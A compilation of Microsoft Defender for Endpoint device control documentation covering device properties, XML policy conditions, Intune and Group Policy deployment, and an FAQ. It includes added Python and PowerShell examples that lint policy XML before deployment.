Windows devices: Y; Mac devices: N; Printers: Y

Property: PrinterConnectionId
Description: The type of printer connection: USB, Corporate, Network, Universal, File,
Custom, Local
Windows devices: N; Mac devices: N; Printers: Y

Property: BusId
Description: Information about the device (for more information, see the sections that
follow this table)
Windows devices: Y; Mac devices: N; Printers: N

Property: DeviceId
Description: Information about the device (see the sections that follow this table)
Windows devices: Y; Mac devices: N; Printers: N

Property: HardwareId
Description: Information about the device (see the sections that follow this table)
Windows devices: Y; Mac devices: N; Printers: N

Property: InstancePathId
Description: Information about the device (see the sections that follow this table)
Windows devices: Y; Mac devices: N; Printers: N

Property: SerialNumberId
Description: Information about the device (see the sections that follow this table)
Windows devices: Y; Mac devices: Y; Printers: N

Property: PID
Description: Product ID is the four-digit product code that the vendor assigns to the
device
Windows devices: Y; Mac devices: Y; Printers: N

Property: VID
Description: Vendor ID is the four-digit vendor code that the USB committee assigns to
the vendor
Windows devices: Y; Mac devices: Y; Printers: N

Property: APFS Encrypted
Description: If the device is APFS encrypted
Windows devices: N; Mac devices: Y; Printers: N

Using Windows Device Manager to determine device properties

For Windows devices, you can use Device Manager to understand the properties of
devices.

1. Open Device Manager, locate the device, right-click on Properties, and then select
the Details tab.

2. In the Property list, select Device instance path.

The value shown for device instance path is the InstancePathId, but it also
contains other properties:

USB\VID_090C&PID_1000\FBH1111183300721
{BusId}\{DeviceId}\{SerialNumberId}

The properties in the device manager map to device control as shown in the
following table:

Device Manager          Device Control
Hardware Ids            HardwareId
Friendly name           FriendlyNameId
Parent                  VID_PID
DeviceInstancePath      InstancePathId

Using reports and advanced hunting to determine properties of devices

Device properties have slightly different labels in advanced hunting. The following table
maps the labels in the portal to the propertyId in a device control policy.

Microsoft Defender Portal property     Device control property Id
Media name                             FriendlyNameId
Vendor Id                              HardwareId
DeviceId                               InstancePathId
Serial Number                          SerialNumberId

7 Note

Make sure that the object selected has the correct Media Class for the policy. In
general, for removable storage, use Class Name == USB.

Configure groups in Intune, XML in Windows, or JSON on Mac

You can configure groups in Intune, by using an XML file for Windows, or by using a
JSON file on Mac. Select each tab for more details.

Intune

Reusable settings in Intune map to device groups. You can configure reusable
settings in Intune.

There are two types of groups: Printer Device and Removable Storage. The
following table lists the properties for these groups.

Group type: Printer device
Properties: FriendlyNameId, PrimaryId, PrinterConnectionId, VID_PID

Group type: Removable storage
Properties: BusId, DeviceId, FriendlyNameId, HardwareId, InstancePathId, PID, PrimaryId,
SerialNumberId, VID, VID_PID

Advanced conditions
Entries can be further restricted based on parameters. Parameters apply advanced
conditions that go beyond the device. Advanced conditions allow for fine-grained
control based on Network, VPN Connection, File or Print Job being evaluated.

7 Note

Advanced conditions are only supported in the XML format.

Network Conditions
The following table describes network group properties:

NameId: The name of the network. Wildcards are supported.
NetworkCategoryId: Valid options are Public, Private, or DomainAuthenticated.
NetworkDomainId: Valid options are NonDomain, Domain, or DomainAuthenticated.

These properties are added to the DescriptorIdList of a group of type Network. Here's
an example snippet:

XML

<Group Id="{e5f619a7-5c58-4927-90cd-75da2348a30a}" Type="Network" MatchType="MatchAll">
    <DescriptorIdList>
        <NetworkCategoryId>Public</NetworkCategoryId>
        <NetworkDomainId>NonDomain</NetworkDomainId>
    </DescriptorIdList>
</Group>

The group is then referenced as parameters in the entry, as illustrated in the following
snippet:

XML

<Entry Id="{1ecfdafb-9b7f-4b66-b3c5-f1d872b0961d}">
    <Type>Deny</Type>
    <Options>0</Options>
    <AccessMask>40</AccessMask>
    <Parameters MatchType="MatchAll">
        <Network MatchType="MatchAny">
            <GroupId>{e5f619a7-5c58-4927-90cd-75da2348a30a}</GroupId>
        </Network>
    </Parameters>
</Entry>

VPN Connection Conditions

The following table describes VPN connection conditions:

NameId: The name of the VPN Connection. Wildcards are supported.
VPNConnectionStatusId: Valid values are Connected or Disconnected.
VPNServerAddressId: The string value of VPNServerAddress. Wildcards are supported.
VPNDnsSuffixId: The string value of VPNDnsSuffix. Wildcards are supported.

These properties are added to the DescriptorIdList of a group of type VPNConnection,
as shown in the following snippet:

XML

<Group Id="{d633d17d-d1d1-4c73-aa27-c545c343b6d7}" Type="VPNConnection">
    <Name>Corporate VPN</Name>
    <MatchType>MatchAll</MatchType>
    <DescriptorIdList>
        <NameId>ContosoVPN</NameId>
        <VPNServerAddressId>contosovpn.*.contoso.com</VPNServerAddressId>
        <VPNDnsSuffixId>corp.contoso.com</VPNDnsSuffixId>
        <VPNConnectionStatusId>Connected</VPNConnectionStatusId>
    </DescriptorIdList>
</Group>

The group is then referenced as parameters in an entry, as illustrated in the following
snippet:

XML

<Entry Id="{27c79875-25d2-4765-aec2-cb2d1000613f}">
    <Type>Allow</Type>
    <Options>0</Options>
    <AccessMask>64</AccessMask>
    <Parameters MatchType="MatchAny">
        <VPNConnection>
            <GroupId>{d633d17d-d1d1-4c73-aa27-c545c343b6d7}</GroupId>
        </VPNConnection>
    </Parameters>
</Entry>

File Conditions
The following table describes file group properties:

PathId: String, value of file path or name. Wildcards are supported. Only applicable for
file type groups.

The following snippet shows how properties are added to the DescriptorIdList of a
file group:

XML

<Group Id="{e5f619a7-5c58-4927-90cd-75da2348a30f}" Type="File" MatchType="MatchAny">
    <DescriptorIdList>
        <PathId>*.exe</PathId>
        <PathId>*.dll</PathId>
    </DescriptorIdList>
</Group>

The group is then referenced as parameters in an entry, as illustrated in the following
snippet:

XML

<Entry Id="{1ecfdafb-9b7f-4b66-b3c5-f1d872b0961d}">
    <Type>Deny</Type>
    <Options>0</Options>
    <AccessMask>40</AccessMask>
    <Parameters MatchType="MatchAll">
        <File MatchType="MatchAny">
            <GroupId>{e5f619a7-5c58-4927-90cd-75da2348a30f}</GroupId>
        </File>
    </Parameters>
</Entry>

Print Job Conditions

The following table describes PrintJob group properties:

PrintOutputFileNameId: The output destination file path for print to file. Wildcards are
supported. For example, C:\*\Test.pdf
PrintDocumentNameId: The source file path. Wildcards are supported. This path might not
exist. For example, add text to a new file in Notepad, and then print without saving the
file.

These properties are added to the DescriptorIdList of a group of type PrintJob, as
illustrated in the following snippet:

XML

<Group Id="{e5f619a7-5c58-4927-90cd-75da2348a30b}" Type="PrintJob" MatchType="MatchAny">
    <DescriptorIdList>
        <PrintOutputFileNameId>C:\Documents\*.pdf</PrintOutputFileNameId>
        <PrintDocumentNameId>*.xlsx</PrintDocumentNameId>
        <PrintDocumentNameId>*.docx</PrintDocumentNameId>
    </DescriptorIdList>
</Group>

The group is then referenced as parameters in an entry, as illustrated in the following
snippet:

XML

<Entry Id="{1ecfdafb-9b7f-4b66-b3c5-f1d872b0961d}">
    <Type>Deny</Type>
    <Options>0</Options>
    <AccessMask>40</AccessMask>
    <Parameters MatchType="MatchAll">
        <PrintJob MatchType="MatchAny">
            <GroupId>{e5f619a7-5c58-4927-90cd-75da2348a30b}</GroupId>
        </PrintJob>
    </Parameters>
</Entry>
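Because advanced conditions are only supported in XML and are edited by hand, a practitioner typically lints a policy before deploying it. The following Python checker is an added example (not Microsoft's code or tooling): it rejects XML that isn't well-formed (such as a descriptor closed with the wrong tag), flags whitespace inside a GroupId reference, checks that each advanced-condition group only uses the properties and enumerated values the tables above list for its type, and verifies that a <Network>, <VPNConnection>, <File> or <PrintJob> condition references a group of that same type. The single <DeviceControl> root holding groups and entries together, and the check names, are constructed for the example; the GUID format is the braced form shown on this page, and uuid4 stands in for the PowerShell GUID generation the article mentions.

```python
"""Lint checks for hand-written device control advanced-condition XML.

Added example, not Microsoft's code or tooling. Allowed property names and
enumerated values are those in the Network, VPN Connection, File and Print
Job tables above; the <DeviceControl> wrapper root that holds groups and
entries together is constructed for the example.
"""
import re
import uuid
import xml.etree.ElementTree as ET

GUID_RE = re.compile(r"^\{[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}\}$")
MATCH_TYPES = {"MatchAll", "MatchAny", "MatchExcludeAll", "MatchExcludeAny"}
# Descriptor properties permitted in each advanced-condition group type.
ALLOWED_PROPS = {
    "Network": {"NameId", "NetworkCategoryId", "NetworkDomainId"},
    "VPNConnection": {"NameId", "VPNConnectionStatusId", "VPNServerAddressId", "VPNDnsSuffixId"},
    "File": {"PathId"},
    "PrintJob": {"PrintOutputFileNameId", "PrintDocumentNameId"},
}
# Properties whose values are enumerations rather than wildcard strings.
ENUM_VALUES = {
    "NetworkCategoryId": {"Public", "Private", "DomainAuthenticated"},
    "NetworkDomainId": {"NonDomain", "Domain", "DomainAuthenticated"},
    "VPNConnectionStatusId": {"Connected", "Disconnected"},
}

def new_guid():
    """Braced GUID in the form the XML expects (uuid4 here; the article uses PowerShell)."""
    return "{%s}" % uuid.uuid4()

def lint_policy(xml_text):
    """Return a list of findings; an empty list means every check passed."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:  # e.g. <NetworkCategoryId>Public</PathId>
        return [f"not well-formed XML: {exc}"]
    findings, groups = [], {}
    for g in root.iter("Group"):
        gid, gtype = g.get("Id", ""), g.get("Type", "")
        groups[gid] = gtype
        if not GUID_RE.match(gid):
            findings.append(f"group Id {gid!r} is not a braced GUID")
        mt = g.get("MatchType") or g.findtext("MatchType")
        if mt not in MATCH_TYPES:
            findings.append(f"group {gid}: unknown MatchType {mt!r}")
        allowed, dlist = ALLOWED_PROPS.get(gtype), g.find("DescriptorIdList")
        if allowed is None or dlist is None:  # Device groups use the device property table
            continue
        for d in dlist:
            value = (d.text or "").strip()
            if d.tag not in allowed:
                findings.append(f"group {gid}: {d.tag} is not valid in a {gtype} group")
            elif d.tag in ENUM_VALUES and value not in ENUM_VALUES[d.tag]:
                findings.append(f"group {gid}: {d.tag} value {value!r} is not allowed")
    for entry in root.iter("Entry"):
        eid, params = entry.get("Id"), entry.find("Parameters")
        for cond in ([] if params is None else list(params)):  # <Network>, <File>, ...
            for ref in cond.findall("GroupId"):
                text = (ref.text or "").strip()
                key = re.sub(r"\s+", "", text)  # a "{ e5f... }" GroupId has inner spaces
                if key != text or not GUID_RE.match(key):
                    findings.append(f"entry {eid}: GroupId {text!r} is not a clean braced GUID")
                if key not in groups:
                    findings.append(f"entry {eid}: GroupId {key} matches no group")
                elif groups[key] != cond.tag:
                    findings.append(f"entry {eid}: <{cond.tag}> references a {groups[key]} group")
    return findings

NET_GID, ENTRY_GID = new_guid(), new_guid()

# Constructed policy modelled on the article's Network condition snippets.
GOOD_POLICY = f"""<DeviceControl>
  <Group Id="{NET_GID}" Type="Network" MatchType="MatchAll"><DescriptorIdList>
    <NetworkCategoryId>Public</NetworkCategoryId><NetworkDomainId>NonDomain</NetworkDomainId>
  </DescriptorIdList></Group>
  <Entry Id="{ENTRY_GID}"><Type>Deny</Type><Options>0</Options><AccessMask>40</AccessMask>
    <Parameters MatchType="MatchAll"><Network MatchType="MatchAny"><GroupId>{NET_GID}</GroupId></Network></Parameters>
  </Entry>
</DeviceControl>"""

# Constructed policy with four defects: a bad enum value, a File property inside a
# Network group, spaces inside the GroupId, and a <File> condition pointing at a Network group.
BAD_POLICY = """<DeviceControl>
  <Group Id="{e5f619a7-5c58-4927-90cd-75da2348a30a}" Type="Network" MatchType="MatchAll"><DescriptorIdList>
    <NetworkCategoryId>Home</NetworkCategoryId><PathId>*.exe</PathId>
  </DescriptorIdList></Group>
  <Entry Id="{1ecfdafb-9b7f-4b66-b3c5-f1d872b0961d}"><Type>Deny</Type><Options>0</Options><AccessMask>40</AccessMask>
    <Parameters MatchType="MatchAll"><File MatchType="MatchAny"><GroupId>{ e5f619a7-5c58-4927-90cd-75da2348a30a }</GroupId></File></Parameters>
  </Entry>
</DeviceControl>"""

# A descriptor closed with the wrong tag is rejected before any semantic check runs.
MISMATCHED_TAGS = """<Group Id="{e5f619a7-5c58-4927-90cd-75da2348a30a}" Type="Network" MatchType="MatchAll">
  <DescriptorIdList><NetworkCategoryId>Public</PathId></DescriptorIdList></Group>"""
```

lint_policy(GOOD_POLICY) returns no findings, lint_policy(BAD_POLICY) returns four, and the mismatched-tag sample is refused by the XML parser before any semantic check runs, which is the same failure a device would hit when it tries to load that setting.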

File evidence
With device control, you can store evidence of files that were copied to removable
devices or were printed. When file evidence is enabled, a RemovableStorageFileEvent is
created. The behavior of file evidence is controlled by options on the Allow action, as
described in the following table:

Option 8: Create a RemovableStorageFileEvent event with FileEvidenceLocation
Option 16: Create a RemovableStorageFileEvent without FileEvidenceLocation

The FileEvidenceLocation field has the location of the evidence file, if one is created.
The evidence file has a name which ends in .dup, and its location is controlled by the
DataDuplicationFolder setting.

Next steps
View device control events and information in Microsoft Defender for Endpoint
Deploy and manage device control in Microsoft Defender for Endpoint with
Microsoft Intune
Deploy and manage device control in Microsoft Defender for Endpoint using
Group Policy
Device Control for macOS


Deploy and manage device control in
Microsoft Defender for Endpoint with
Microsoft Intune
Article • 02/23/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

If you're using Intune to manage Defender for Endpoint settings, you can use it to
deploy and manage device control capabilities. Different aspects of device control are
managed differently in Intune, as described in the following sections.

Configure and manage device control in Intune

1. Go to the Intune admin center and sign in.

2. Go to Endpoint security > Attack surface reduction.

3. Under Attack surface reduction policies, either select an existing policy, or select
+ Create Policy to set up a new policy, using these settings:

In the Platform list, select Windows 10, Windows 11, and Windows Server.
(Device control is not currently supported on Windows Server, even though
you select this profile for device control policies.)
In the Profile list, select Device Control.

4. On the Basics tab, specify a name and description for your policy.

5. On the Configuration settings tab, you see a list of settings. You don't have to
configure all of these settings at once. Consider starting with Device Control.

Under Administrative Templates, you have Device Installation and Removable
Storage Access settings.
Under Defender, see Allow Full Scan Removable Drive Scanning settings.
Under Data Protection, see Allow Direct Memory Access settings.
Under Dma Guard, see Device Enumeration Policy settings.
Under Storage, see Removable Disk Deny Write Access settings.
Under Connectivity, see Allow USB Connection and Allow Bluetooth settings.
Under Bluetooth, see a list of settings that pertain to Bluetooth connections
and services. For more details, see Policy CSP - Bluetooth.
Under Device Control, you can configure custom policies with reusable
settings. For more details, see Device control overview: Rules.

6. After you have configured your settings, proceed to the Scope tags tab, where you
can specify scope tags for the policy.

7. On the Assignments tab, specify groups of users or devices to receive your policy.
For more details, see Assign policies in Intune.

8. On the Review + create tab, review your settings, and make any needed changes.

9. When you're ready, select Create to create your device control policy.

Device control profiles

In Intune, each row represents a device control policy. The included ID is the reusable
setting that the policy applies to. The excluded ID is the reusable setting that's excluded
from the policy. The entry for the policy contains the permissions allowed and the
behavior for device control that comes into force when the policy applies.

For information on how to add the reusable groups of settings that are included in the
row of each device control policy, see the Add reusable groups to a Device Control profile
section in Use reusable groups of settings with Intune policies.

Policies can be added and removed using the + and – icons. The name of the policy
appears in the warning to users, and in advanced hunting and reports.

You can add audit policies, and you can add Allow/Deny policies. It is recommended to
always add an Allow and/or Deny policy when adding an audit policy so that you don't
experience unexpected results.

Important

If you only configure audit policies, the permissions are inherited from the default
enforcement setting.

Note

The order in which policies are listed in the user interface isn't preserved for
policy enforcement. The best practice is to use Allow/Deny policies. Ensure that
the Allow/Deny policies are non-intersecting by explicitly adding devices to be
excluded. Using Intune's graphical interface, you cannot change the default
enforcement. If you change the default enforcement to Deny, any allow policy
results in blocking actions.

Defining Settings with OMA-URI

In the following table, identify the setting you want to configure, and then use the
information in the OMA-URI and data type & values columns. Settings are listed in
alphabetical order.

Setting: Device control default enforcement
  Description: Default enforcement establishes what decisions are made during device
  control access checks when none of the policy rules match.
  OMA-URI: ./Vendor/MSFT/Defender/Configuration/DefaultEnforcement
  Data type & values: Integer
    - DefaultEnforcementAllow = 1
    - DefaultEnforcementDeny = 2

Setting: Device types
  Description: Device types, identified by their Primary IDs, with device control
  protection turned on.
  OMA-URI: ./Vendor/MSFT/Defender/Configuration/SecuredDevicesConfiguration
  Data type & values: String
    - RemovableMediaDevices
    - CdRomDevices
    - WpdDevices
    - PrinterDevices

Setting: Enable device control
  Description: Enable or disable device control on the device.
  OMA-URI: ./Vendor/MSFT/Defender/Configuration/DeviceControlEnabled
  Data type & values: Integer
    - Disable = 0
    - Enable = 1

Setting: Evidence data remote location
  Description: Location to which device control moves the evidence data it captures.
  OMA-URI: ./Vendor/MSFT/Defender/Configuration/DataDuplicationRemoteLocation
  Data type & values: String

Setting: Local evidence cache duration
  Description: Sets the retention period in days for files in the local device control
  cache.
  OMA-URI: ./Vendor/MSFT/Defender/Configuration/DataDuplicationLocalRetentionPeriod
  Data type & values: Integer. Example: 60 (60 days)

Creating policies with OMA-URI

When you create policies with OMA-URI in Intune, create one XML file for each policy.
As a best practice, use the Device Control Profile or Device Control Rules Profile to
author custom policies.

In the Add Row pane, specify the following settings:

In the Name field, type Allow Read Activity.

In the OMA-URI field, type
./Vendor/MSFT/Defender/Configuration/DeviceControl/PolicyRules/%7b[PolicyRuleId]%7d/RuleData

In the Data Type field, select String (XML file), and use Custom XML.

You can use parameters to set conditions for specific entries. Here's a group example
XML file for Allow Read access for each removable storage.

Note

Comments using XML comment notation can be used in the Rule and Group XML
files, but they must be inside the first XML tag, not the first line of the XML file.

Creating groups with OMA-URI

When you create groups with OMA-URI in Intune, create one XML file for each group.
As a best practice, use reusable settings to define groups.

In the Add Row pane, specify the following settings:

In the Name field, type Any Removable Storage Group.

In the OMA-URI field, type
./Vendor/MSFT/Defender/Configuration/DeviceControl/PolicyGroups/%7b[GroupId]%7d/GroupData
(To get your GroupId, in the Intune admin center, go to Groups, and then select Copy
the Object ID.)

In the Data Type field, select String (XML file), and use Custom XML.

Note

Comments using XML comment notation <!-- COMMENT --> can be used in the Rule and
Group XML files, but they must be inside the first XML tag, not the first line of
the XML file.

Configure removable storage access control using OMA-URI

1. Go to the Microsoft Intune admin center and sign in.
2. Choose Devices > Configuration profiles. The Configuration profiles page
appears.

3. Under the Policies tab (selected by default), select + Create, and choose + New
policy from the drop-down that appears. The Create a profile page appears.

4. In the Platform list, select Windows 10, Windows 11, and Windows Server from
the Platform drop-down list, and choose Templates from the Profile type drop-
down list.

Once you choose Templates from the Profile type drop-down list, the Template
name pane is displayed, along with a search box (to search the profile name).

5. Select Custom from the Template name pane, and select Create.

6. Create a row for each setting, group, or policy by implementing Steps 1-5.

View device control groups (Reusable settings)

In Intune, device control groups appear as reusable settings.

1. Go to the Microsoft Intune admin center and sign in.

2. Go to Endpoint Security > Attack Surface Reduction.

3. Select the Reusable Settings tab.

See also
Device control in Defender for Endpoint
Device control policies and settings
Device Control for macOS



Deploy and manage device control in
Microsoft Defender for Endpoint using
Group Policy
Article • 02/14/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

If you're using Group Policy to manage Defender for Endpoint settings, you can use it to
deploy and manage device control.

Enable or disable removable storage access control

1. On a device running Windows, go to Computer Configuration > Administrative
Templates > Windows Components > Microsoft Defender Antivirus > Features >
Device Control.

2. In the Device Control window, select Enabled.

Note

If you don't see these Group Policy Objects, you need to add the Group Policy
Administrative Templates (ADMX). You can download the administrative templates
(WindowsDefender.adml and WindowsDefender.admx) from the mdatp-devicecontrol
Windows samples on GitHub.

Set default enforcement

You can set the default access, Deny or Allow, for all device control features, such as
RemovableMediaDevices, CdRomDevices, WpdDevices, and PrinterDevices.

For example, you can have either a Deny or an Allow policy for RemovableMediaDevices,
but not for CdRomDevices or WpdDevices. If you set Default Deny through this policy,
then Read/Write/Execute access to CdRomDevices or WpdDevices is blocked. If you only
want to manage storage, make sure to create an Allow policy for printers. Otherwise,
the default enforcement (Deny) is applied to printers, too.

1. On a device running Windows, go to Computer Configuration > Administrative
Templates > Windows Components > Microsoft Defender Antivirus > Features >
Device Control > Select Device Control Default Enforcement Policy.

2. In the Select Device Control Default Enforcement Policy window, select Default
Deny.

Configure device types

To configure the device types that a device control policy applies to, follow these steps:

1. On a computer running Windows, go to Computer Configuration >
Administrative Templates > Windows Components > Microsoft Defender
Antivirus > Device Control > Turn on device control for specific device types.

2. In the Turn on device control for specific device types window, specify the product
family IDs, separated by a pipe (|). Product family IDs include RemovableMediaDevices,
CdRomDevices, WpdDevices, or PrinterDevices.

Define groups

1. Create one XML file for each removable storage group.

2. Use the properties in your removable storage group to create an XML file for each
removable storage group.

3. Save each XML file to your network share.

4. Define the settings as follows:

a. On a device running Windows, go to Computer Configuration > Administrative
Templates > Windows Components > Microsoft Defender Antivirus > Device
Control > Define device control policy groups.

b. In the Define device control policy groups window, specify the network share
file path containing the XML groups data.

You can create different group types. Here's one group example XML file for any
removable storage and CD-ROM, Windows portable devices, and approved USBs group:

XML file

Note

Comments using XML comment notation <!--COMMENT--> can be used in the Rule
and Group XML files, but they must be inside the first XML tag, not the first line of
the XML file.

Define Policies

1. Create one XML file for each access policy rule.

2. Use the properties in your removable storage access policy rule(s) to create an XML
file for each group's removable storage access policy rule.

3. Save the XML file to your network share.

4. Define the settings as follows:

a. On a device running Windows, go to Computer Configuration > Administrative
Templates > Windows Components > Microsoft Defender Antivirus > Device
Control > Define device control policy rules.

b. In the Define device control policy rules window, select Enabled, and then
specify the network share file path containing the XML rules data.

Note

Comments using XML comment notation <!-- COMMENT --> can be used in the Rule
and Group XML files, but they must be inside the first XML tag, not the first line of
the XML file.

Set location for a copy of the file (evidence)

If you want to keep a copy of a file (evidence) when Write access is granted, set the
right Options in your removable storage access policy rule in the XML file, and then
specify the location where the system can save the copy.

1. On a device running Windows, go to Computer Configuration > Administrative
Templates > Windows Components > Microsoft Defender Antivirus > Device
Control > Define Device Control evidence data remote location.

2. In the Define Device Control evidence data remote location window, select
Enabled, and then specify the local or network share folder path.

Retention period for local evidence cache

If you want to change the default value of 60 days for persisting the local cache for file
evidence, follow these steps:

1. Go to Computer Configuration > Administrative Templates > Windows
Components > Microsoft Defender Antivirus > Device Control > Set the
retention period for files in the local device control cache.

2. In the Set the retention period for files in the local device control cache window,
select Enabled, and then enter the number of days to retain the local cache
(default 60).

See also
Device control in Defender for Endpoint
Device control policies and settings
Device Control for macOS



Microsoft Defender for Endpoint Device
Control frequently asked questions
Article • 02/01/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

This article provides answers to frequently asked questions about device control
removable storage capabilities in Microsoft Defender for Endpoint.

How do I generate a GUID for Group ID/PolicyRule ID/Entry ID?

You can generate the GUID through an online open source tool or by using PowerShell. For
more information, see How to generate GUID through PowerShell.

What are the removable storage media and policy limitations?

The backend call is done through OMA-URI (GET to read or PATCH to update) either
from Intune or through the Microsoft Graph API. The limitation is the same as for any
OMA-URI custom configuration profile at Microsoft, which is officially 350,000 characters
for XML files. For example, if you need two blocks of entries per user SID to "Allow" /
"Audit allowed" specific users, and then two blocks of entries at the end to "Deny" all,
you'll be able to manage 2,276 users.

Why doesn't the policy work?

The most common reason is that the required anti-malware client version isn't installed.
Another reason could be that the XML file isn't correctly formatted. For example, the "&"
character might not be escaped correctly in the XML file, or the text editor might add a
byte order mark (BOM) 0xEF 0xBB 0xBF at the beginning of the file, causing the XML
parsing to fail. One simple solution is to download the sample file (select Raw and then
Save as), and then update it.

If you're deploying and managing the policy by using Group Policy, make sure to
combine all policy rules into one XML file within a parent node called PolicyRules . Also,
combine all groups into one XML file within a parent node called Groups . If you're
managing devices with Intune, keep separate XML files for each group and policy when
deploying as Custom OMA-URI .

The device (machine) should have a valid certificate. Run the following command on the
machine to check:

Get-AuthenticodeSignature C:\Windows\System32\wbem\WmiPrvSE.exe

If the policy still isn't working, contact support, and share your support cab. To get that
file, open Command Prompt as an administrator, and then use the following command:

"%programfiles%\Windows Defender\MpCmdRun.exe" -GetFiles
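
The formatting failures listed above (a BOM, an unescaped "&", the wrong parent node for
the deployment method, the OMA-URI size limit, a malformed Id) can be caught before
deployment. The following PowerShell function is an added example, not part of the
Microsoft documentation; it assumes the device control XML layout in which Group,
PolicyRule and Entry elements carry an Id attribute, and the folder path in the usage
line is a placeholder.

```powershell
# Added example, not from the Microsoft documentation: pre-deployment checks for device
# control XML files covering the failure modes described above (UTF-8 BOM, malformed XML
# such as an unescaped "&", the wrong parent node for the deployment method, the OMA-URI
# size limit, and non-GUID Ids). Paths in the usage line are placeholders.
function Test-DeviceControlXml {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Path,
        # GroupPolicy expects one combined file (root <PolicyRules> or <Groups>);
        # Intune expects one file per rule or group (root <PolicyRule> or <Group>).
        [ValidateSet('GroupPolicy', 'Intune')] [string] $Target = 'Intune',
        # Character limit quoted above for a custom OMA-URI configuration profile.
        [int] $MaxChars = 350000
    )

    $problems = New-Object 'System.Collections.Generic.List[string]'
    $bytes    = [System.IO.File]::ReadAllBytes($Path)

    # 1. Byte order mark: a file starting with EF BB BF is not parsed by device control.
    if ($bytes.Length -ge 3 -and $bytes[0] -eq 0xEF -and $bytes[1] -eq 0xBB -and $bytes[2] -eq 0xBF) {
        $problems.Add('File starts with a UTF-8 BOM (EF BB BF); save it without one.')
    }

    # 2. Well-formedness: an unescaped "&" or an unclosed tag fails here. The BOM character
    #    is trimmed so the rest of the file can still be checked after it was reported above.
    $text = [System.Text.Encoding]::UTF8.GetString($bytes).TrimStart([char]0xFEFF)
    $xml  = New-Object System.Xml.XmlDocument
    try {
        $xml.LoadXml($text)
    } catch {
        $problems.Add("Not well-formed XML: $($_.Exception.Message)")
        return [pscustomobject]@{ Path = $Path; Valid = $false; Problems = $problems.ToArray() }
    }

    # 3. The parent node must match the deployment method.
    $root     = $xml.DocumentElement.LocalName
    $expected = if ($Target -eq 'GroupPolicy') { @('PolicyRules', 'Groups') } else { @('PolicyRule', 'Group') }
    if ($expected -notcontains $root) {
        $problems.Add("Root element is <$root>; $Target deployment expects <$($expected -join '> or <')>.")
    }

    # 4. Intune pushes the file through a custom OMA-URI profile, which caps the XML size.
    if ($Target -eq 'Intune' -and $text.Length -gt $MaxChars) {
        $problems.Add("File is $($text.Length) characters; the OMA-URI limit is $MaxChars.")
    }

    # 5. Every group, rule and entry Id must be a GUID in braces (for example from New-Guid).
    foreach ($node in $xml.SelectNodes('//Group | //PolicyRule | //Entry')) {
        $id = $node.GetAttribute('Id')
        if ($id -notmatch '^\{[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}\}$') {
            $problems.Add("<$($node.LocalName)> has Id '$id'; expected a GUID in braces.")
        }
    }

    [pscustomobject]@{ Path = $Path; Valid = ($problems.Count -eq 0); Problems = $problems.ToArray() }
}

# Usage: check every file in a folder before deploying it as a custom OMA-URI profile.
Get-ChildItem -Path 'C:\DeviceControl\*.xml' |
    ForEach-Object { Test-DeviceControlXml -Path $_.FullName -Target Intune } |
    Format-List Path, Valid, Problems
```

For Group Policy, run the same function with -Target GroupPolicy against the two combined
files so the PolicyRules and Groups parent nodes are verified instead of the size limit.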

Why is there no configuration UX for some policy groups?

There is no configuration UX for Define device control policy groups and Define device
control policy rules in your Group Policy. But you can still get the related .adml and
.admx files by selecting Raw and Save as at the WindowsDefender.adml and
WindowsDefender.admx files.

How do I confirm that the latest policy has been deployed to the target machine?

You can run the PowerShell cmdlet Get-MpComputerStatus as an administrator. The
following value will show whether the latest policy has been applied to the target
machine.

How can I know which machine is using an out-of-date anti-malware client version in
the organization?

You can use the following query to get the anti-malware client version in the Microsoft
365 security portal:

Kusto

//check the anti-malware client version
DeviceFileEvents
| where FileName == "MsMpEng.exe"
| where FolderPath contains @"C:\ProgramData\Microsoft\Windows Defender\Platform\"
| extend PlatformVersion=tostring(split(FolderPath, "\\", 5))
//| project DeviceName, PlatformVersion // check which machine is using legacy platformVersion
| summarize dcount(DeviceName) by PlatformVersion // check how many machines are using which platformVersion
| order by PlatformVersion desc

How do I find the media property in the Device Manager?

1. Plug in the media.

2. Open Device Manager.

3. Locate the media in the Device Manager, right-click, and then select Properties.

4. Open Details, and then select Properties.

Another way is to deploy an Audit policy to the organization, and see the events in
advanced hunting or the device control report.

How do I find the SID for a Microsoft Entra group?

For a Microsoft Entra group, the SID used in the policy is the group's Object ID. You can
find the Object ID in the Azure portal.

Why is my printer blocked in my organization?

The Default Enforcement setting is for all device control components, which means if
you set it to Deny, it blocks all printers as well. You can either create a custom policy to
explicitly allow printers, or you can replace the Default Enforcement policy with a custom
policy.

Why is creating a folder not blocked by File system level access?

Creating an empty folder isn't blocked even if File system level access Write access Deny
is configured. Any non-empty file is blocked.

Why is my USB still blocked with an allow-read policy?

Some specific USB devices require more than Read access. The following list shows some
examples:

1. To allow Read access, some Kingston encrypted USBs require Execute access for their
CDROM.

2. To allow Read access, some WD My Passport USBs require Disk level Write access. In
this case, if you want to deny Write access, you should use File system level access.

The best way to understand this is to check the event in advanced hunting, which
clearly shows what accessMask is required.

Can I use both Group Policy and Intune to deploy policies?

You can use Group Policy and Intune to manage device control, but for one machine,
use either Group Policy or Intune. If a machine is covered by both, device control only
applies the Group Policy setting.

Is device control available in Microsoft Defender for Business?

Yes, for Windows and Mac.

To set up device control on Windows, use attack surface reduction rules in Defender for
Business. You'll need Microsoft Intune. The standalone version of Defender for Business
does not include Intune, but it can be added on. Microsoft 365 Business Premium does
include Intune. See Microsoft Defender for Endpoint Device Control Removable Storage
Access Control.

To set up device control on Mac, use Intune or Jamf. See Device Control for macOS.

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.

View device control events and
information in Microsoft Defender for
Endpoint
Article • 02/02/2024

Microsoft Defender for Endpoint device control helps protect your organization from
potential data loss, malware, or other cyberthreats by allowing or preventing certain
devices to be connected to users' computers. You can view information about device
control events with advanced hunting or by using the device control report.

To access the Microsoft Defender portal , your subscription must include Microsoft 365
for E5 reporting.

Select each tab to learn more about advanced hunting and the device control report.

Advanced hunting

Applies to:

